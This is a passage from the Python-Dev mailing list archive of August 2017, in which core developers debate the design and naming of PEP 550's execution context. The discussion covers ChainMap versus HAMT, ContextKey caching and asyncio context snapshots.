pay off. (B) Other than the truly global context and thread-level context, how many of these maps do you expect to be non-empty? (C) How deep do you expect the stack to get? Are we talking about 100 layers of mappings to check between the current generator and the thread-wide defaults? Even if we are, verifying that there hasn't been a change in some mid-level layer requires tracking the versions of each mid-level layer. (If version is globally unique, that would also ensure that the stack hasn't changed.) Is that really faster than checking that the map is empty? And, of course, using a ChainMap means that the keys do NOT have to be predefined ... so the Key class really can be skipped. -jJ From yselivanov.ml at gmail.com Thu Aug 24 01:12:48 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Thu, 24 Aug 2017 01:12:48 -0400 Subject: [Python-Dev] PEP 550 leak-in vs leak-out, why not just a ChainMap In-Reply-To: References: Message-ID: Hi Jim, Sorry, I don't answer all questions/points directly. We are working on a new version of the PEP that will hopefully address most of them. Some comments inlined below: On Thu, Aug 24, 2017 at 12:32 AM, Jim J. Jewett wrote: [..] > I still don't see how this is different from a ChainMap. Because conceptually it's not different. In the next version of the PEP it will become more apparent. [..] > >> HAMT is a way to efficiently implement immutable mappings ... >> using regular dicts and copy, set() would be O(log N) The key requirement for using immutable datastructures is to make "get_execution_context" operation fast. Currently, the PEP doesn't do a good job at explaining why we need that operation and why it will be used by asyncio.Task and call_soon, so I understand the confusion. This will be fixed in the next PEP version. > > Using a ChainMap, set affects only the localmost map and is therefore > O(1). get could require stacksize lookups, but ... Again, the PEP essentially is implemented through a very specialized version of ChainMap, although written in C with a few extra optimizations and properties. > > (A) How many values do you expect a typical generator to use? The > django survey suggested mostly 0, sometimes 1, occasionally 2. So > caching the values of all possible keys probably won't pay off. Not many, but caching is still as important, because some API users want the "get()" operation to be as fast as possible under all conditions. > > (B) Other than the truly global context and thread-level context, how > many of these maps do you expect to be non-empty? It's likely that most of them will be empty in most cases. Although we can imagine a degenerate case of a recursive generator that modifies EC on each iteration. > > (C) How deep do you expect the stack to get? Are we talking about > 100 layers of mappings to check between the current generator and the > thread-wide defaults? Even if we are, verifying that there hasn't > been a change in some mid-level layer requires tracking the versions > of each mid-level layer. (If version is globally unique, that would > also ensure that the stack hasn't changed.) Is that really faster > than checking that the map is empty? The stack can be as deep as recursion limit. > > And, of course, using a ChainMap means that the keys do NOT have to be > predefined ... so the Key class really can be skipped. The first version of the PEP had no ContextKey object and the most popular complaint about it was that the key names will clash. The ContextKey design avoids clashing issue entirely and enables fast Python and C APIs (because of the cache). Yury From solipsis at pitrou.net Thu Aug 24 04:22:33 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Thu, 24 Aug 2017 10:22:33 +0200 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> Message-ID: <20170824102233.6229b43c@fsol> On Wed, 23 Aug 2017 14:27:55 -0400 Yury Selivanov wrote: > > Yeah.. I like TaskContext when it's applied to asynchronous code. It > doesn't really work for generators because we never refer to > generators as tasks. > > Out of what was proposed so far to replace Logical Context: > > 1. DynamicContext: close to "dynamic scoping", but tries to avoid > mentioning "scopes". There are only a few languages where dynamic > scoping is implemented, so people are generally not aware of it. > > 2. ContextFrame and all frame-related names: implies that EC is > somehow implemented on top of frames or is frame-specific (which is > not always true). > > 3. ImplicitContext: covers one specific property observed from > specific examples. Context in PEP 550 is managed explicitly in some > cases. There are many use cases when API users will be working with it > explicitly too (to wrirte/read data from it). FWIW I believe that > "ExplicitContext" would be more accurate than "ImplicitContext". > > 4. LocalContext: we use "local" to describe local variables and > scoping in Python, we want to avoid any confusion here. > > 5. TaskContext: works for asynchronous tasks, but not for generators. > > I don't think that replacing LogicalContext with any name in this list > will make any improvement. I think you have a point. Though every time I want to type "logical context" it seems my fingers slip and type "local context" instead :-) Now remains the question of why the logical context stack is named "execution context" and not "logical context stack" (or "logical context chain" to keep the ChainMap analogy) :-) Regards Antoine. From ncoghlan at gmail.com Thu Aug 24 04:22:55 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Thu, 24 Aug 2017 18:22:55 +1000 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> Message-ID: On 24 August 2017 at 02:19, Yury Selivanov wrote: > I think that "implicit context" is not an accurate description of what > LogicalContext is. > > "implicit context" only makes sense when we talk about decimal > context. For instance, in: > > Decimal(1) + Decimal(2) > > decimal context is implicit. But this is "implicit" from the > standpoint of that code. Decimal will manage its context > *explicitly*. > > Fixing decimal context is only one part of the PEP though. EC will > also allow to implement asynchronous task locals: > > current_request = new_context_key() > > async def handle_http_request(request): > current_request.set(request) > > Here we explicitly set and will explicitly get values from the EC. We > will explicitly manage the EC in asyncio.Task and when we schedule > callbacks. The implicit behaviour that "implicit context" refers to is the fact that if you look at an isolated snippet of code, you have no idea what context you're actually going to be querying or modifying - that's implicit in the execution of the whole program. As a user of the read/write API though, you shouldn't need to care all that much - the whole point of PEP 550 is to define default behaviours and guidelines such that it will be something sensible. Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From njs at pobox.com Thu Aug 24 04:22:52 2017 From: njs at pobox.com (Nathaniel Smith) Date: Thu, 24 Aug 2017 01:22:52 -0700 Subject: [Python-Dev] PEP 550 leak-in vs leak-out, why not just a ChainMap In-Reply-To: References: Message-ID: On Wed, Aug 23, 2017 at 9:32 PM, Jim J. Jewett wrote: >> While the context is defined conceptually as a nested chain of >> key:value mappings, we avoid using the mapping syntax because of the >> way the values can shift dynamically out from under you based on who >> called you > ... >> instead of having the problem of changes inside the >> generator leaking out, we instead had the problem of >> changes outside the generator *not* making their way in > > I still don't see how this is different from a ChainMap. > > If you are using a stack(chain) of [d_global, d_thread, d_A, d_B, d_C, > d_mine] maps as your implicit context, then a change to d_thread map > (that some other code could make) will be visible unless it is masked. > > Similarly, if the fallback for d_C changes from d_B to d_B1 (which > points directly to d_thread), that will be visible for any keys that > were previously resolved in d_A or d_B, or are now resolved in dB1. > > Those seem like exactly the cases that would (and should) cause > "shifting values". > > This does mean that you can't cache everything in the localmost map, > but that is a problem with the optimization regardless of how the > implementation is done. It's crucial that the only thing that can effect the result of calling ContextKey.get() is other method calls on that same ContextKey within the same thread. That's what enables ContextKey to efficiently cache repeated lookups, which is an important optimization for code like decimal or numpy that needs to access their local context *extremely* quickly (like, a dict lookup is too slow). In fact this caching trick is just preserving what decimal does right now in their thread-local handling (because accessing the threadstate dict is too slow for them). So we can't expose any kind of mutable API to individual maps, because then someone might call __setitem__ on some map that's lower down in the stack, and break caching. > And, of course, using a ChainMap means that the keys do NOT have to be > predefined ... so the Key class really can be skipped. The motivations for the Key class are to eliminate the need to worry about accidental key collisions between unrelated libraries, to provide some important optimizations (as per above), and to make it easy and natural to provide convenient APIs like for saving and restoring the state of a value inside a context manager. Those are all orthogonal to whether the underlying structure is implemented as a ChainMap or as something more specialized. But I tend to agree with your general argument that the current PEP is trying a bit too hard to hide away all this structure where no-one can see it. The above constraints mean that simply exposing a ChainMap as the public API is probably a bad idea. Even if there are compelling performance advantages to fancy immutable-HAMT implementation (I'm in wait-and-see mode on this myself), then there are still a lot more introspection-y operations that could be provided, like: - make a LocalContext out of a {ContextKey: value} dict - get a {ContextKey: value} dict out of a LocalContext - get the underlying list of LocalContexts out of an ExecutionContext - create an ExecutionContext out of a list of LocalContexts - given a ContextKey and a LocalContext, get the current value of the key in the context - given a ContextKey and an ExecutionContext, get out a list of values at each level -n -- Nathaniel J. Smith -- https://vorpus.org From njs at pobox.com Thu Aug 24 05:01:18 2017 From: njs at pobox.com (Nathaniel Smith) Date: Thu, 24 Aug 2017 02:01:18 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> Message-ID: On Thu, Aug 24, 2017 at 1:22 AM, Nick Coghlan wrote: > On 24 August 2017 at 02:19, Yury Selivanov wrote: >> I think that "implicit context" is not an accurate description of what >> LogicalContext is. >> >> "implicit context" only makes sense when we talk about decimal >> context. For instance, in: >> >> Decimal(1) + Decimal(2) >> >> decimal context is implicit. But this is "implicit" from the >> standpoint of that code. Decimal will manage its context >> *explicitly*. >> >> Fixing decimal context is only one part of the PEP though. EC will >> also allow to implement asynchronous task locals: >> >> current_request = new_context_key() >> >> async def handle_http_request(request): >> current_request.set(request) >> >> Here we explicitly set and will explicitly get values from the EC. We >> will explicitly manage the EC in asyncio.Task and when we schedule >> callbacks. > > The implicit behaviour that "implicit context" refers to is the fact > that if you look at an isolated snippet of code, you have no idea what > context you're actually going to be querying or modifying - that's > implicit in the execution of the whole program. How about: RuntimeContext and RuntimeContextStack -n -- Nathaniel J. Smith -- https://vorpus.org From ncoghlan at gmail.com Thu Aug 24 07:37:19 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Thu, 24 Aug 2017 21:37:19 +1000 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: <599E0610.7090508@stoneleaf.us> References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> <599DD2C2.2010402@stoneleaf.us> <599E0610.7090508@stoneleaf.us> Message-ID: On 24 August 2017 at 08:47, Ethan Furman wrote: > > ContextVars is actually a different name for LogicalContext. So it would > be: > > ExecutionContext = [ContextVars()[, ContextVars()[ ...]]] > > and you get the (thread.local similar) ContextVars by > > context_vars = sys.get_context_vars() # or whatever > context_vars.verbose = ... Migrating a (variant of a) naming subthread from python-ideas over to here, does the following sound plausible to anyone else?: ContextLocal - read/write access API (via get()/set() methods) ContextLocalNamespace - active mapping that CL.get()/set() manipulates ExecutionContext - current stack of context local namespaces Building a threading.local() style helper API would then look something like: class ContextLocals: def __init__(self, key_prefix): self._key_prefix = key_prefix def __getattr__(self, attr): debugging_name = "{}.{}".format(self._key_prefix, attr) self.__dict__[attr] = new_local = sys.new_context_local(debugging_name) return new_local def __setattr__(self, attr, value): getattr(self, attr).set(value) def __delattr__(self, attr): getattr(self, attr).set(None) my_state = ContextLocals(__name__) Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From barry at python.org Thu Aug 24 09:52:47 2017 From: barry at python.org (Barry Warsaw) Date: Thu, 24 Aug 2017 09:52:47 -0400 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) Message-ID: Guido van Rossum wrote: > On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: > > I worry that that's going to lead more people astray thinking this has > something to do with contextlib, which it really doesn't (it's much more > closely related to threading.local()). This is my problem with using "Context" for this PEP. Although I can't keep up with all names being thrown around, it seems to me that in Python we already have a well-established meaning for "contexts" -- context managers, and the protocols they implement as they participate in `with` statements. We have contextlib which reinforces this. What's being proposed in PEP 550 is so far removed from this concept that I think it's just going to cause confusion (well, it does in me anyway!). To me, the functionality proposed in PEP 550 feels more like a "scope" than a "context". Unlike a lexical scope, it can't be inferred from the layout of the source code. It's more of a dynamic "execution scope" and the stacking of "local execution scopes" reinforces that for me. You use a key to find a value in the current execution scope, and it chains up until the key is found or you've reached the top of the local execution (defined as the thread start, etc.). One other suggestion: maybe we shouldn't put these new functions in sys, but instead put them in their own module? It feels analogous to the gc module; all those functions could have gone in sys since they query and effect the Python runtime system, but it makes more sense (and improves the naming) by putting them in their own module. It also segregates the functionality so that sys doesn't become a catchall that overloads you when you're reading through the sys module documentation. Cheers, -Barry From solipsis at pitrou.net Thu Aug 24 10:02:29 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Thu, 24 Aug 2017 16:02:29 +0200 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) References: Message-ID: <20170824160229.7eb4f4a2@fsol> On Thu, 24 Aug 2017 09:52:47 -0400 Barry Warsaw wrote: > > To me, the functionality proposed in PEP 550 feels more like a "scope" > than a "context". I would call it "environment" myself, but that risks confusion with environment variables. Perhaps "dynamic environment" would remove the confusion. > One other suggestion: maybe we shouldn't put these new functions in sys, > but instead put them in their own module? It feels analogous to the gc > module; all those functions could have gone in sys since they query and > effect the Python runtime system, but it makes more sense (and improves > the naming) by putting them in their own module. It also segregates the > functionality so that sys doesn't become a catchall that overloads you > when you're reading through the sys module documentation. +1 from me. Regards Antoine. From jimjjewett at gmail.com Thu Aug 24 10:05:05 2017 From: jimjjewett at gmail.com (Jim J. Jewett) Date: Thu, 24 Aug 2017 10:05:05 -0400 Subject: [Python-Dev] PEP 550 leak-in vs leak-out, why not just a ChainMap In-Reply-To: References: Message-ID: On Thu, Aug 24, 2017 at 1:12 AM, Yury Selivanov > On Thu, Aug 24, 2017 at 12:32 AM, Jim J. Jewett wrote: > The key requirement for using immutable datastructures is to make > "get_execution_context" operation fast. Do you really need the whole execution context, or do you just need the current value of a specific key? (Or, sometimes, the writable portion of the context.) > Currently, the PEP doesn't do > a good job at explaining why we need that operation and why it will be > used by asyncio.Task and call_soon, so I understand the confusion. OK, the schedulers need the whole context, but if implemented as a ChainMap (instead of per-key), isn't that just a single constant? As in, don't they always schedule to the same thread? And when they need another map, isn't that because the required context is already available from whichever code requested the scheduling? >> (A) How many values do you expect a typical generator to use? The >> django survey suggested mostly 0, sometimes 1, occasionally 2. So >> caching the values of all possible keys probably won't pay off. > Not many, but caching is still as important, because some API users > want the "get()" operation to be as fast as possible under all > conditions. Sure, but only because they view it as a hot path; if the cost of that speedup is slowing down another hot path, like scheduling the generator in the first place, it may not be worth it. According to the PEP timings, HAMT doesn't beat a copy-on-write dict until over 100 items, and never beats a regular dict. That suggests to me that it won't actually help the overall speed for a typical (as opposed to worst-case) process. >> And, of course, using a ChainMap means that the keys do NOT have to be >> predefined ... so the Key class really can be skipped. > The first version of the PEP had no ContextKey object and the most > popular complaint about it was that the key names will clash. That is true of any global registry. Thus the use of keys with prefixes like com.sun. The only thing pre-declaring a ContextKey buys in terms of clashes is that a sophisticated scheduler would have less difficulty figuring out which clashes will cause thrashing in the cache. Or are you suggesting that the key can only be declared once (as opposed to once per piece of code), so that the second framework to use the same name will see a RuntimeError? -jJ From yselivanov.ml at gmail.com Thu Aug 24 10:23:23 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Thu, 24 Aug 2017 10:23:23 -0400 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: Message-ID: On Thu, Aug 24, 2017 at 9:52 AM, Barry Warsaw wrote: > Guido van Rossum wrote: >> On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: >> >> I worry that that's going to lead more people astray thinking this has >> something to do with contextlib, which it really doesn't (it's much more >> closely related to threading.local()). > > This is my problem with using "Context" for this PEP. Although I can't > keep up with all names being thrown around, it seems to me that in > Python we already have a well-established meaning for "contexts" -- > context managers, and the protocols they implement as they participate > in `with` statements. We have contextlib which reinforces this. What's > being proposed in PEP 550 is so far removed from this concept that I > think it's just going to cause confusion (well, it does in me anyway!). Although nobody refers to context managers as "context", they are always called with on of the following: "context manager", "CM", "context manager protocol". PEP 550 just introduces a concept of "context", that "context managers" will be able to manage. > > To me, the functionality proposed in PEP 550 feels more like a "scope" > than a "context". Unlike a lexical scope, it can't be inferred from the > layout of the source code. It's more of a dynamic "execution scope" and > the stacking of "local execution scopes" reinforces that for me. You > use a key to find a value in the current execution scope, and it chains > up until the key is found or you've reached the top of the local > execution (defined as the thread start, etc.). Yes, what PEP 550 proposes can be seen as a new scoping mechanism. But calling it a "scope" or "dynamic scope" would be a mistake (IMHO), as Python scoping is already a complex topic (with locals, nonlocals, globals, etc). Contrary to scoping, the programmer is much less likely to deal with Execution Context. How often do we use "threading.local()"? > One other suggestion: maybe we shouldn't put these new functions in sys, > but instead put them in their own module? It feels analogous to the gc > module; all those functions could have gone in sys since they query and > effect the Python runtime system, but it makes more sense (and improves > the naming) by putting them in their own module. It also segregates the > functionality so that sys doesn't become a catchall that overloads you > when you're reading through the sys module documentation. I'm myself not a big fan of jamming all PEP 550 APIs into the sys module. We just need to come up with a good name. Yury From barry at python.org Thu Aug 24 10:38:42 2017 From: barry at python.org (Barry Warsaw) Date: Thu, 24 Aug 2017 10:38:42 -0400 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: Message-ID: On Aug 24, 2017, at 10:23, Yury Selivanov wrote: > > On Thu, Aug 24, 2017 at 9:52 AM, Barry Warsaw wrote: >> Guido van Rossum wrote: >>> On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: >>> >>> I worry that that's going to lead more people astray thinking this has >>> something to do with contextlib, which it really doesn't (it's much more >>> closely related to threading.local()). >> >> This is my problem with using "Context" for this PEP. Although I can't >> keep up with all names being thrown around, it seems to me that in >> Python we already have a well-established meaning for "contexts" -- >> context managers, and the protocols they implement as they participate >> in `with` statements. We have contextlib which reinforces this. What's >> being proposed in PEP 550 is so far removed from this concept that I >> think it's just going to cause confusion (well, it does in me anyway!). > > Although nobody refers to context managers as "context", they are > always called with on of the following: "context manager", "CM", > "context manager protocol". PEP 550 just introduces a concept of > "context", that "context managers" will be able to manage. > >> >> To me, the functionality proposed in PEP 550 feels more like a "scope" >> than a "context". Unlike a lexical scope, it can't be inferred from the >> layout of the source code. It's more of a dynamic "execution scope" and >> the stacking of "local execution scopes" reinforces that for me. You >> use a key to find a value in the current execution scope, and it chains >> up until the key is found or you've reached the top of the local >> execution (defined as the thread start, etc.). > > Yes, what PEP 550 proposes can be seen as a new scoping mechanism. But > calling it a "scope" or "dynamic scope" would be a mistake (IMHO), as > Python scoping is already a complex topic (with locals, nonlocals, > globals, etc). > > Contrary to scoping, the programmer is much less likely to deal with > Execution Context. How often do we use "threading.local()?? Yes, but in conversations about Python, the term ?context? (in the context of context managers) comes up way more often than the term ?scope?. I actually think Python?s scoping rules are fairly easy to grasp, as there aren?t that many levels or ways to access them, and the natural, common interactions are basically implicit when thinking about the code you?re writing. So while ?context?, ?environment?, and ?scope? are certainly overloaded terms in Python, the first two have very specific existing, commonplace constructs within Python, and ?scope? is both the least overloaded of the three and most closely matches what is actually going on. A different tack would more closely align with PEP 550?s heritage in thread-local storage, calling these things ?execution storage?. I think I read Guido suggest elsewhere using a namespace here so that in common code you?d only have to change the ?threading.local()? call to migrate to PEP 550. It might be neat if you could do something like: import execution els = execution.local() els.x = 1 By calling it ?execution local storage? you?re also providing a nicer cognitive bridge from ?thread local storage?, a concept anybody diving into this stuff will already understand pretty innately. No need to get fancy, we just think ?Oh, I know what thread local storage is, and this seems related but slightly different, so now I basically understand what execution local storage is?. Cheers, -Barry -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 833 bytes Desc: Message signed with OpenPGP URL: From p.f.moore at gmail.com Thu Aug 24 10:56:24 2017 From: p.f.moore at gmail.com (Paul Moore) Date: Thu, 24 Aug 2017 15:56:24 +0100 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: Message-ID: On 24 August 2017 at 15:38, Barry Warsaw wrote: > Yes, but in conversations about Python, the term ?context? (in the context of context managers) comes up way more often than the term ?scope?. I actually think Python?s scoping rules are fairly easy to grasp, as there aren?t that many levels or ways to access them, and the natural, common interactions are basically implicit when thinking about the code you?re writing. > > So while ?context?, ?environment?, and ?scope? are certainly overloaded terms in Python, the first two have very specific existing, commonplace constructs within Python, and ?scope? is both the least overloaded of the three and most closely matches what is actually going on. > > A different tack would more closely align with PEP 550?s heritage in thread-local storage, calling these things ?execution storage?. I think I read Guido suggest elsewhere using a namespace here so that in common code you?d only have to change the ?threading.local()? call to migrate to PEP 550. It might be neat if you could do something like: I strongly agree with Barry's reservations about using the term "context" here. I've not been following the discussion (I was away when it started and there's too many emails to go through to catch up) but I've found the use of the term "context" to be a particular problem in trying to understand what's going on just skimming the messages. I don't have a strong opinion on what name should be used, but I am definitely against using the term "context". Paul From guido at python.org Thu Aug 24 11:00:04 2017 From: guido at python.org (Guido van Rossum) Date: Thu, 24 Aug 2017 08:00:04 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> <599DD2C2.2010402@stoneleaf.us> <599E0610.7090508@stoneleaf.us> Message-ID: It shouldn't be called a namespace unless the dominant access is via attributes. On Thu, Aug 24, 2017 at 4:37 AM, Nick Coghlan wrote: > On 24 August 2017 at 08:47, Ethan Furman wrote: > > > > ContextVars is actually a different name for LogicalContext. So it would > > be: > > > > ExecutionContext = [ContextVars()[, ContextVars()[ ...]]] > > > > and you get the (thread.local similar) ContextVars by > > > > context_vars = sys.get_context_vars() # or whatever > > context_vars.verbose = ... > > Migrating a (variant of a) naming subthread from python-ideas over to > here, does the following sound plausible to anyone else?: > > ContextLocal - read/write access API (via get()/set() methods) > ContextLocalNamespace - active mapping that CL.get()/set() manipulates > ExecutionContext - current stack of context local namespaces > > Building a threading.local() style helper API would then look something > like: > > class ContextLocals: > def __init__(self, key_prefix): > self._key_prefix = key_prefix > > def __getattr__(self, attr): > debugging_name = "{}.{}".format(self._key_prefix, attr) > self.__dict__[attr] = new_local = > sys.new_context_local(debugging_name) > return new_local > > def __setattr__(self, attr, value): > getattr(self, attr).set(value) > > def __delattr__(self, attr): > getattr(self, attr).set(None) > > my_state = ContextLocals(__name__) > > Cheers, > Nick. > > -- > Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/ > guido%40python.org > -- --Guido van Rossum (python.org/~guido) -------------- next part -------------- An HTML attachment was scrubbed... URL: From yselivanov.ml at gmail.com Thu Aug 24 11:02:55 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Thu, 24 Aug 2017 11:02:55 -0400 Subject: [Python-Dev] PEP 550 leak-in vs leak-out, why not just a ChainMap In-Reply-To: References: Message-ID: On Thu, Aug 24, 2017 at 10:05 AM, Jim J. Jewett wrote: > On Thu, Aug 24, 2017 at 1:12 AM, Yury Selivanov > On Thu, Aug 24, 2017 > at 12:32 AM, Jim J. Jewett wrote: > >> The key requirement for using immutable datastructures is to make >> "get_execution_context" operation fast. > > Do you really need the whole execution context, or do you just need > the current value of a specific key? (Or, sometimes, the writable > portion of the context.) We really need a snapshot of all keys/values. If we have the following "chain": EC = [{'a': 'b'}, {'spam': 'ham'}, {}, {'a': 'foo', 'num': 42}] we need sys.get_execution_context() to return this: {'spam': 'ham', 'a': 'foo', 'num': 42} To do this with chain map and mutable maps, you need to traverse the whole chain and merge all dicts -- this is very expensive. Immutable datastructures make it possible to avoid merge and traverse (in most cases) so the operation becomes cheap. Don't forget, that the EC is a *dynamic* stack -- a generator starts, it pushes its LogicalContext, etc. Without a way to get a full "snapshot" of the EC we can't support asynchronous tasks: If you look at this small example: foo = new_context_key() async def nested(): await asyncio.sleep(1) print(foo.get()) async def outer(): foo.set(1) await nested() foo.set(1000) l = asyncio.get_event_loop() l.create_task(outer()) l.run_forever() If will print "1", as "nested()" coroutine will see the "foo" key when it's awaited. Now let's say we want to refactor this snipped and run the "nested()" coroutine with a timeout: foo = new_context_key() async def nested(): await asyncio.sleep(1) print(foo.get()) async def outer(): foo.set(1) await asyncio.wait_for(nested(), 10) # !!! foo.set(1000) l = asyncio.get_event_loop() l.create_task(outer()) l.run_forever() So we wrap our `nested()` in a `wait_for()`, which creates a new asynchronous tasks to run `nested()`. That task will now execute on its own, separately from the task that runs `outer()`. So we need to somehow capture the full EC at the moment `wait_for()` was called, and use that EC to run `nested()` within it. If we don't do this, the refactored code would print "1000", instead of "1". If asynchronous tasks topic is not enough: suppose you want to write a wrapper on top of concurrent.futures.ThreadPoolExecutor to offload some calculation to a threadpool. If you can "snapshot" the EC, you can do it: when you schedule a job, the EC is captured, and it is a guarantee that it will not be mutated before the job is executed. And it's also guaranteed that the job will not randomly mutate the EC of the code that scheduled it. >> Currently, the PEP doesn't do >> a good job at explaining why we need that operation and why it will be >> used by asyncio.Task and call_soon, so I understand the confusion. > > OK, the schedulers need the whole context, but if implemented as a > ChainMap (instead of per-key), I think you are a bit confused here (or I don't follow you) with the "per-key" ConceptKey design. With ConceptKeys: key = new_concept_key('spam') key.set('a') # EC = [..., {key: 'a'}] without: ec.set('key', 'a') # EC = [..., {'key': 'a'}] ConceptKey is an extra indirection layer that allows for granular caching and avoids the names clashing. > isn't that just a single constant? As > in, don't they always schedule to the same thread? And when they need > another map, isn't that because the required context is already > available from whichever code requested the scheduling? > >>> (A) How many values do you expect a typical generator to use? The >>> django survey suggested mostly 0, sometimes 1, occasionally 2. So >>> caching the values of all possible keys probably won't pay off. > >> Not many, but caching is still as important, because some API users >> want the "get()" operation to be as fast as possible under all >> conditions. > > Sure, but only because they view it as a hot path; if the cost of that > speedup is slowing down another hot path, like scheduling the > generator in the first place, it may not be worth it. > > According to the PEP timings, HAMT doesn't beat a copy-on-write dict > until over 100 items, and never beats a regular dict. That suggests > to me that it won't actually help the overall speed for a typical (as > opposed to worst-case) process. It's a bit more complicated, unfortunately. The "100 items" it true when we can just memcpy all keys/values of the dict when we want to clone it. I've proposed a patch to do that, and it works. The old implementation of "dict.copy()" created a new dict, iterated over items of the old dict, and inserted them to the new one. This 5x slower than memcpy. The subtle difference is that the memcpy implementation does not resize the dict. The resize is needed when we delete items from it (which will happen with EC). I've updated the chart to show what happens when we implement immutable dict with the current dict.copy() semantics: https://github.com/python/peps/blob/master/pep-0550-hamt_vs_dict.png The fundamental problem, though, is that EC is hidden from the user. Suppose you have a huge application (let's say new YouTube) that uses a multitude of libraries. You can then be in a situation that some of those libraries use the EC, and you actually have 100s of items in it. Now at least one LC in the chain is big, and its copying becomes expensive. You start to experience overhead -- sometimes setting a variable to the EC is expensive, sometime capturing the context takes longer, etc. HAMT guarantees that immutable dicts will have O(log N) performance for set() and merge (we will need to merge long chains from time to time, btw). This means that it's a future proof solution that works in all edge cases. > >>> And, of course, using a ChainMap means that the keys do NOT have to be >>> predefined ... so the Key class really can be skipped. > >> The first version of the PEP had no ContextKey object and the most >> popular complaint about it was that the key names will clash. > > That is true of any global registry. Thus the use of keys with > prefixes like com.sun. Such prefixes aren't considered Pythonic though. In the end, ContextKey is needed to give us O(1) get() operation (because of caching). This is a hard requirement, otherwise we can't migrate libraries like decimal to use this new API. > > The only thing pre-declaring a ContextKey buys in terms of clashes is > that a sophisticated scheduler would have less difficulty figuring out > which clashes will cause thrashing in the cache. I don't understand what you mean by "sophisticated scheduler". > > Or are you suggesting that the key can only be declared once (as > opposed to once per piece of code), so that the second framework to > use the same name will see a RuntimeError? ContextKey is declared once for the code that uses it. Nobody else will use that key. Keys have names only for introspection purposes, the implementation doesn't use it, iow: var = new_context_key('aaaaaa') var.set(1) # EC = [..., {var: 1}] # Note the that EC has a "var" object itself as the key in the mapping, not "aaaaa". Yury From yselivanov.ml at gmail.com Thu Aug 24 11:02:55 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Thu, 24 Aug 2017 11:02:55 -0400 Subject: [Python-Dev] PEP 550 leak-in vs leak-out, why not just a ChainMap In-Reply-To: References: Message-ID: On Thu, Aug 24, 2017 at 10:05 AM, Jim J. Jewett wrote: > On Thu, Aug 24, 2017 at 1:12 AM, Yury Selivanov > On Thu, Aug 24, 2017 > at 12:32 AM, Jim J. Jewett wrote: > >> The key requirement for using immutable datastructures is to make >> "get_execution_context" operation fast. > > Do you really need the whole execution context, or do you just need > the current value of a specific key? (Or, sometimes, the writable > portion of the context.) We really need a snapshot of all keys/values. If we have the following "chain": EC = [{'a': 'b'}, {'spam': 'ham'}, {}, {'a': 'foo', 'num': 42}] we need sys.get_execution_context() to return this: {'spam': 'ham', 'a': 'foo', 'num': 42} To do this with chain map and mutable maps, you need to traverse the whole chain and merge all dicts -- this is very expensive. Immutable datastructures make it possible to avoid merge and traverse (in most cases) so the operation becomes cheap. Don't forget, that the EC is a *dynamic* stack -- a generator starts, it pushes its LogicalContext, etc. Without a way to get a full "snapshot" of the EC we can't support asynchronous tasks: If you look at this small example: foo = new_context_key() async def nested(): await asyncio.sleep(1) print(foo.get()) async def outer(): foo.set(1) await nested() foo.set(1000) l = asyncio.get_event_loop() l.create_task(outer()) l.run_forever() If will print "1", as "nested()" coroutine will see the "foo" key when it's awaited. Now let's say we want to refactor this snipped and run the "nested()" coroutine with a timeout: foo = new_context_key() async def nested(): await asyncio.sleep(1) print(foo.get()) async def outer(): foo.set(1) await asyncio.wait_for(nested(), 10) # !!! foo.set(1000) l = asyncio.get_event_loop() l.create_task(outer()) l.run_forever() So we wrap our `nested()` in a `wait_for()`, which creates a new asynchronous tasks to run `nested()`. That task will now execute on its own, separately from the task that runs `outer()`. So we need to somehow capture the full EC at the moment `wait_for()` was called, and use that EC to run `nested()` within it. If we don't do this, the refactored code would print "1000", instead of "1". If asynchronous tasks topic is not enough: suppose you want to write a wrapper on top of concurrent.futures.ThreadPoolExecutor to offload some calculation to a threadpool. If you can "snapshot" the EC, you can do it: when you schedule a job, the EC is captured, and it is a guarantee that it will not be mutated before the job is executed. And it's also guaranteed that the job will not randomly mutate the EC of the code that scheduled it. >> Currently, the PEP doesn't do >> a good job at explaining why we need that operation and why it will be >> used by asyncio.Task and call_soon, so I understand the confusion. > > OK, the schedulers 